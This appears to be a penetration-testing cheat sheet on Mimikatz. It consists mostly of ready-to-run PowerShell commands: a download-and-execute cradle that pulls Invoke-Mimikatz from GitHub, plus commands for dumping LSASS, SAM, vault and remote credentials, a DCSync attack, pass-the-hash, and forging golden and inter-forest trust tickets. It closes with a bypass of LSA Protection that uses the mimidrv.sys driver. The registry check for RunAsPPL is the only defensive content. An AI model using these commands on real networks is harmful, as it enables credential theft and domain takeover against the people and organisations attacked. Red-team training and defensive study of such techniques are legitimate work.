# Mimikatz **URL:** ### Dump Credentials ```bash # Download and execute in cradle IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1') #Dump creds from memory Invoke-Mimikatz -DumpCreds # DCSync Attack Invoke-Mimikatz -Command '"lsadump::dcsync /domain:security.local /user:moe"' # Dump local passwords Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"' # Dump Credential Vault Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"' # Dump credentials on remote systems Invoke-Mimikatz -DumpCreds -ComputerName @("WS01","WS02") ``` ### Dump Domain Credentials ```bash Invoke-Mimikatz -Command '"lsadump::lsa /patch"' ``` ### Spawn PowerShell (with compromised NTLM hash) ```powershell Invoke-Mimikatz -Command '"sekurlsa::pth /user:DomainAdmin /domain:Security.local /ntlm:b38ff50264b7458734d82c69794a4d8 /run:powershell.exe"' ``` ### Forge Inter-domain trust ticket ```powershell # Obtain trust key between current domain and external domain Invoke-Mimikatz -Command '"lsadump::trust /patch"' # An inter-forest TGT can be forged Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:Security.local /sid:S-1-5-21-1874506000-3219952063-538504511 /rc4:815720462a1b48256f16740b70356b7f /service:krbtgt /target:Vault.local /ticket:C:\AD\trust_forest_tkt.kirbi"' ``` ### Over pass the hash ```powershell Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:Security.local /ntlm: /run:powershell.exe"' ``` ## Protection Bypass The below image represents an attempt to access the lsass.exe process and extract clear text passwords and run a skeleton key attack. As we can see this has not been successful since applying the registry key change mentioned in the mitigation section for LSA Protection. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-595269a5c73c2c6efa903889a7b0d36e6a5d02b3%2Fimage.png?alt=media) We can check if the LSA Protection RunAsPPL key exists by querying the registry to confirm the LSA protection is in place. ```bash reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "RunAsPPL" # Value 0x1 means LSA Protection is enabled ``` This can be bypassed by utilizing the `mimidrv.sys` driver file which is included as a separate file with mimikatz. {% hint style="info" %} The mimidrv.sys driver file needs to exists in the same directory as mimikatz.exe. {% endhint %} The driver can be loaded by running the command `!+` in `Mimikatz`. After doing so the following command can be execute to protect the `mimikatz.exe` process. ```bash !processProtect /process:mimikatz.exe ``` The same command with the `/remove` flag can be used to strip the process protection from a process such as `lsass.exe` ```bash !processprotect /process:lsass.exe /remove ``` From here we should be free to perform actions against LSASS and dump credentials from it. ``` mimikatz.exe sekurlsa::logonpasswords ```